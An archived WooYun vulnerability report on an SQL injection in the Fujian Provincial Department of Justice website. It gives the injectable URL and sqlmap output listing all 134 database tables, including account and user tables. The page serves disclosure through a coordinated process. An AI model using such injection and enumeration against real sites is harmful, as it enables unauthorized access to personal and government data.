当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-039261

漏洞标题:福建省司法厅注射大量数据库泄露

相关厂商:福建省司法厅

漏洞作者: 雅柏菲卡

提交时间:2013-10-10 12:13

修复时间:2013-11-24 12:14

公开时间:2013-11-24 12:14

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:8

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-10-10: 细节已通知厂商并且等待厂商处理中
2013-10-14: 厂商已经确认,细节仅向厂商公开
2013-10-24: 细节向核心白帽子及相关领域专家公开
2013-11-03: 细节向普通白帽子公开
2013-11-13: 细节向实习白帽子公开
2013-11-24: 细节向公众公开

简要描述:

.....

详细说明:

.....

漏洞证明:

注射点:http://www.fjsf.gov.cn/fjsf/templates/xxgk/default_xxgkContent.jsp?modelId=85&atcId=65896


back-end DBMS: Microsoft SQL Server 2000
[07:58:15] [INFO] fetching tables for database 'fjsf'
[07:58:15] [INFO] fetching number of tables for database 'fjsf'
[07:58:15] [INFO] retrieved: 134
[07:58:26] [INFO] retrieved: dbo.abc
[07:59:25] [INFO] retrieved: dbo.application
[08:00:43] [INFO] retrieved: dbo.cert_lawyer
[08:02:32] [INFO] retrieved: dbo.cert_member
[08:03:47] [INFO] retrieved: dbo.cert_record
[08:04:43] [INFO] retrieved: dbo.company
[08:06:05] [INFO] retrieved: dbo.D99_CMD
[08:07:11] [INFO] retrieved: dbo.D99_Tmp
[08:08:14] [INFO] retrieved: dbo.dtprop[08:10:04] [CRITICAL] connection timed ou
t to the target url or proxy, sqlmap is going to retry the request
e[08:10:51] [CRITICAL] connection timed out to the target url or proxy, sqlmap i
s going to retry the request
rties
[08:11:38] [INFO] retrieved: dbo.gip_appraisal_organ
[08:14:01] [INFO] retrieved: dbo.gip_appraisal_organ_changling
[08:15:40] [INFO] retrieved: dbo.gip_appraisal_organ_hortation
[08:17:17] [INFO] retrieved: dbo.gip_appraisal_organ_punish
[08:18:28] [INFO] retrieved: dbo.gip_appraiser
[08:18:59] [INFO] retrieved: dbo.gip_appraiser_20121107
[08:20:17] [INFO] retrieved: dbo.gip_appraiser_20121113
[08:21:03] [INFO] retrieved: dbo.gip_appraiser_chasten
[08:21:59] [INFO] retrieved: dbo.gip_appraiser_hortation
[08:23:14] [INFO] retrieved: dbo.gip_appraiser_suffer
[08:24:18] [INFO] retrieved: dbo.gip_appraiser3
[08:24:45] [INFO] retrieved: dbo.gip_banner
[08:25:49] [INFO] retrieved: dbo.gip_code
[08:27:11] [INFO] retrieved: dbo.gip_data
[08:27:51] [INFO] retrieved: dbo.gip_dict
[08:28:25] [INFO] retrieved: dbo.gip_exam_counts
[08:30:14] [INFO] retrieved: dbo.gip_exam_standby
[08:31:33] [INFO] retrieved: dbo.gip_exam_zgcx
[08:32:19] [INFO] retrieved: dbo.gip_flfw
[08:33:24] [INFO] retrieved: dbo.gip_flfw_fws
[08:34:38] [INFO] retrieved: dbo.gip_flfw_fws_bak
[08:35:43] [INFO] retrieved: dbo.gip_flfw_fws_hortation
[08:37:39] [INFO] retrieved: dbo.gip_flfw_fws_punishment
[08:39:54] [INFO] retrieved: dbo.gip_flfw_publish_fws_yearCheckResult
[08:43:52] [INFO] retrieved: dbo.gip_flyz_organ
[08:45:42] [INFO] retrieved: dbo.gip_greffier_member
[08:47:58] [INFO] retrieved: dbo.gip_greffier_member_cha[08:49:49] [CRITICAL] co
nnection timed out to the target url or proxy, sqlmap is going to retry the requ
est
sten
[08:50:22] [INFO] retrieved: dbo.gip_greffier_member_enrollment
[08:52:55] [INFO] retrieved: dbo.gip_greffier_member_hortation
[08:55:13] [INFO] retrieved: dbo.gip_greffier_member_narrate
[08:56:53] [INFO] retrieved: dbo.gip_greffier_member_suffer
[08:58:30] [INFO] retrieved: dbo.gip_greffier_office
[08:59:37] [INFO] retrieved: dbo.gip_greffier_office_changling
[09:01:47] [INFO] retrieved: dbo.gip_greffier_office_crics
[09:03:07] [INFO] retrieved: dbo.gip_greffier_office_hortation
[09:05:57] [INFO] retrieved: dbo.gip_greffier_office_[09:07:49] [CRITICAL] conne
ction timed out to the target url or proxy, sqlmap is going to retry the request
p[09:08:44] [CRITICAL] connection timed out to the target url or proxy, sqlmap i
s going to retry the request
unish
[09:10:41] [INFO] retrieved: dbo.gip_law_member_chasten
[09:16:51] [INFO] retrieved: dbo.gip_law_member_enrollment
[09:22:01] [INFO] retrieved: dbo.gip_law_member_hortation
[09:25:28] [INFO] retrieved: dbo.gip_law_member_lawer
[09:27:32] [INFO] retrieved: dbo.gip_law_member_lawer_back
[09:29:55] [INFO] retrieved: dbo.gip_law_member_lawer2
[09:30:55] [INFO] retrieved: dbo.gip_law_member_narrate
[09:32:46] [INFO] retrieved: dbo.gip_law_member_suffer
[09:34:11] [INFO] retrieved: dbo.gip_law_office
[09:35:10] [INFO] retrieved: dbo.gip_law_office_chan[09:36:43] [CRITICAL] unable
 to connect to the target url or proxy, sqlmap is going to retry the request
g[09:37:17] [CRITICAL] connection timed out to the target url or proxy, sqlmap i
s going to retry the request
ling
[09:38:03] [INFO] retrieved: dbo.gip_law_office_crics
[09:39:17] [INFO] retrieved: dbo.gip_law_office_hortation
[09:41:27] [INFO] retrieved: dbo.gip_law_office_punish
[09:42:52] [INFO] retrieved: dbo.gip_primary_office
[09:45:57] [INFO] retrieved: dbo.gip_primary_office_crics
[09:47:43] [INFO] retrieved: dbo.gip_primary_office_hortation
[09:49:49] [INFO] retrieved: dbo.gip_primary_office_punish
[09:51:49] [INFO] retrieved: dbo.info_month_num
[09:54:57] [INFO] retrieved: dbo.jc_count_num
[09:58:00] [INFO] retrieved: dbo.jc_count_num1
[09:59:10] [INFO] retrieved: dbo.jc_xxgk_gkgd
[10:01:25] [INFO] retrieved: dbo.jc_xxgk_ml
[10:02:46] [INFO] retrieved: dbo.jc_xxgk_ndbg
[10:04:07] [INFO] retrieved: dbo.jc_xxgk_sqgk
[10:05:37] [INFO] retrieved: dbo.jc_xxgk_yjx
[10:06:54] [INFO] retrieved: dbo.jc_xxgk_zn
[10:07:47] [INFO] retrieved: dbo.old_data
[10:09:07] [INFO] retrieved: dbo.sheet1$
[10:10:19] [INFO] retrieved: dbo.sysconstraints
[10:12:40] [INFO] retrieved: dbo.syssegments
[10:14:10] [INFO] retrieved: dbo.system_log
[10:15:24] [INFO] retrieved: dbo.t_area_one
[10:17:19] [INFO] retrieved: dbo.t_history_record
[10:20:08] [INFO] retrieved: dbo.T_Inter_View
[10:22:15] [INFO] retrieved: dbo.T_Inter_voice
[10:23:33] [INFO] retrieved: dbo.t_population_count
[10:26:51] [INFO] retrieved: dbo.t_Public_Message
[10:29:42] [INFO] retrieved: dbo.t_Public_MessReply
[10:30:59] [INFO] retrieved: dbo.t_Public_opinion
[10:32:45] [INFO] retrieved: dbo.t_question
[10:34:16] [INFO] retrieved: dbo.t_questions
[10:34:57] [INFO] retrieved: dbo.t_questions_category
[10:36:50] [INFO] retrieved: dbo.t_synCounter
[10:38:42] [INFO] retrieved: dbo.t_sys_account
[10:40:29] [INFO] retrieved: dbo.t_sys_account_part
[10:41:41] [INFO] retrieved: dbo.t_sys_articleScope
[10:43:44] [INFO] retrieved: dbo.t_sys_browse_count
[10:46:04] [INFO] retrieved: dbo.t_sys_business
[10:47:55] [INFO] retrieved: dbo.t_sys_comment
[10:49:36] [INFO] retrieved: dbo.t_sys_content
[10:51:00] [INFO] retrieved: dbo.t_sys_content_fjipo
[10:52:29] [INFO] retrieved: dbo.t_sys_content_recycle
[10:54:17] [INFO] retrieved: dbo.t_sys_dep
[10:55:25] [INFO] retrieved: dbo.t_sys_groups
[10:57:03] [INFO] retrieved: dbo.t_sys_ip
[10:57:58] [INFO] retrieved: dbo.t_sys_mail
[10:59:38] [INFO] retrieved: dbo.t_sys_mailbox
[11:00:57] [INFO] retrieved: dbo.t_sys_mailbox_content
[11:03:28] [INFO] retrieved: dbo.t_sys_mailbox_question
[11:05:56] [INFO] retrieved: dbo.t_sys_model
[11:07:15] [INFO] retrieved: dbo.t_sys_modelclick
[11:08:39] [INFO] retrieved: dbo.t_sys_modelGroup
[11:10:09] [INFO] retrieved: dbo.t_sys_modeltype
[11:11:35] [INFO] retrieved: dbo.t_sys_motif
[11:12:38] [INFO] retrieved: dbo.t_sys_option
[11:13:59] [INFO] retrieved: dbo.t_sys_part
[11:15:11] [INFO] retrieved: dbo.t_sys_questionType
[11:18:02] [INFO] retrieved: dbo.t_sys_report
[11:19:42] [INFO] retrieved: dbo.t_sys_scope
[11:21:07] [INFO] retrieved: dbo.t_sys_select
[11:22:35] [INFO] retrieved: dbo.t_sys_sort
[11:23:33] [INFO] retrieved: dbo.t_sys_template
[11:25:31] [INFO] retrieved: dbo.t_sys_templatetype
[11:27:25] [INFO] retrieved: dbo.t_sys_text
[11:28:23] [INFO] retrieved: dbo.t_sys_title
[11:29:45] [INFO] retrieved: dbo.t_sys_viewcount
[11:31:54] [INFO] retrieved: dbo.t_theme_collect
[11:34:41] [INFO] retrieved: dbo.T_WSSP
[11:35:57] [INFO] retrieved: dbo.test
[11:37:00] [INFO] retrieved: dbo.UserInfo
[11:39:03] [INFO] retrieved: dbo.VisitDetail
[11:41:33] [INFO] retrieved: dbo.WCRTEMP00139
[11:44:09] [INFO] retrieved: dbo.WCRTEMP00140
[11:45:02] [INFO] retrieved: dbo.zxft_context
[11:47:43] [INFO] retrieved: dbo.zxft_images
[11:49:16] [INFO] retrieved: dbo.zxft_nextTheme
[11:51:26] [INFO] retrieved: dbo.zxft_recentTheme
[11:53:36] [INFO] retrieved: dbo.zxft_theme
[11:54:48] [INFO] retrieved: dbo.??
Database: fjsf
[134 tables]
+------------------------------------------+
| dbo.                                     |
| dbo.D99_CMD                              |
| dbo.D99_Tmp                              |
| dbo.T_Inter_View                         |
| dbo.T_Inter_voice                        |
| dbo.T_WSSP                               |
| dbo.UserInfo                             |
| dbo.VisitDetail                          |
| dbo.WCRTEMP00139                         |
| dbo.WCRTEMP00140                         |
| dbo.abc                                  |
| dbo.application                          |
| dbo.cert_lawyer                          |
| dbo.cert_member                          |
| dbo.cert_record                          |
| dbo.company                              |
| dbo.dtproperties                         |
| dbo.gip_appraisal_organ                  |
| dbo.gip_appraisal_organ_changling        |
| dbo.gip_appraisal_organ_hortation        |
| dbo.gip_appraisal_organ_punish           |
| dbo.gip_appraiser                        |
| dbo.gip_appraiser3                       |
| dbo.gip_appraiser_20121107               |
| dbo.gip_appraiser_20121113               |
| dbo.gip_appraiser_chasten                |
| dbo.gip_appraiser_hortation              |
| dbo.gip_appraiser_suffer                 |
| dbo.gip_banner                           |
| dbo.gip_code                             |
| dbo.gip_data                             |
| dbo.gip_dict                             |
| dbo.gip_exam_counts                      |
| dbo.gip_exam_standby                     |
| dbo.gip_exam_zgcx                        |
| dbo.gip_flfw                             |
| dbo.gip_flfw_fws                         |
| dbo.gip_flfw_fws_bak                     |
| dbo.gip_flfw_fws_hortation               |
| dbo.gip_flfw_fws_punishment              |
| dbo.gip_flfw_publish_fws_yearCheckResult |
| dbo.gip_flyz_organ                       |
| dbo.gip_greffier_member                  |
| dbo.gip_greffier_member_chasten          |
| dbo.gip_greffier_member_enrollment       |
| dbo.gip_greffier_member_hortation        |
| dbo.gip_greffier_member_narrate          |
| dbo.gip_greffier_member_suffer           |
| dbo.gip_greffier_office                  |
| dbo.gip_greffier_office_changling        |
| dbo.gip_greffier_office_crics            |
| dbo.gip_greffier_office_hortation        |
| dbo.gip_greffier_office_punish           |
| dbo.gip_law_member_chasten               |
| dbo.gip_law_member_enrollment            |
| dbo.gip_law_member_hortation             |
| dbo.gip_law_member_lawer                 |
| dbo.gip_law_member_lawer2                |
| dbo.gip_law_member_lawer_back            |
| dbo.gip_law_member_narrate               |
| dbo.gip_law_member_suffer                |
| dbo.gip_law_office                       |
| dbo.gip_law_office_changling             |
| dbo.gip_law_office_crics                 |
| dbo.gip_law_office_hortation             |
| dbo.gip_law_office_punish                |
| dbo.gip_primary_office                   |
| dbo.gip_primary_office_crics             |
| dbo.gip_primary_office_hortation         |
| dbo.gip_primary_office_punish            |
| dbo.info_month_num                       |
| dbo.jc_count_num                         |
| dbo.jc_count_num1                        |
| dbo.jc_xxgk_gkgd                         |
| dbo.jc_xxgk_ml                           |
| dbo.jc_xxgk_ndbg                         |
| dbo.jc_xxgk_sqgk                         |
| dbo.jc_xxgk_yjx                          |
| dbo.jc_xxgk_zn                           |
| dbo.old_data                             |
| dbo.sheet1$                              |
| dbo.sysconstraints                       |
| dbo.syssegments                          |
| dbo.system_log                           |
| dbo.t_Public_MessReply                   |
| dbo.t_Public_Message                     |
| dbo.t_Public_opinion                     |
| dbo.t_area_one                           |
| dbo.t_history_record                     |
| dbo.t_population_count                   |
| dbo.t_question                           |
| dbo.t_questions                          |
| dbo.t_questions_category                 |
| dbo.t_synCounter                         |
| dbo.t_sys_account                        |
| dbo.t_sys_account_part                   |
| dbo.t_sys_articleScope                   |
| dbo.t_sys_browse_count                   |
| dbo.t_sys_business                       |
| dbo.t_sys_comment                        |
| dbo.t_sys_content                        |
| dbo.t_sys_content_fjipo                  |
| dbo.t_sys_content_recycle                |
| dbo.t_sys_dep                            |
| dbo.t_sys_groups                         |
| dbo.t_sys_ip                             |
| dbo.t_sys_mail                           |
| dbo.t_sys_mailbox                        |
| dbo.t_sys_mailbox_content                |
| dbo.t_sys_mailbox_question               |
| dbo.t_sys_model                          |
| dbo.t_sys_modelGroup                     |
| dbo.t_sys_modelclick                     |
| dbo.t_sys_modeltype                      |
| dbo.t_sys_motif                          |
| dbo.t_sys_option                         |
| dbo.t_sys_part                           |
| dbo.t_sys_questionType                   |
| dbo.t_sys_report                         |
| dbo.t_sys_scope                          |
| dbo.t_sys_select                         |
| dbo.t_sys_sort                           |
| dbo.t_sys_template                       |
| dbo.t_sys_templatetype                   |
| dbo.t_sys_text                           |
| dbo.t_sys_title                          |
| dbo.t_sys_viewcount                      |
| dbo.t_theme_collect                      |
| dbo.test                                 |
| dbo.zxft_context                         |
| dbo.zxft_images                          |
| dbo.zxft_nextTheme                       |
| dbo.zxft_recentTheme                     |
| dbo.zxft_theme                           |
+------------------------------------------+
C:\Python27>h

修复方案:

................

版权声明:转载请注明来源 雅柏菲卡@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2013-10-14 23:24

厂商回复:

最新状态:

暂无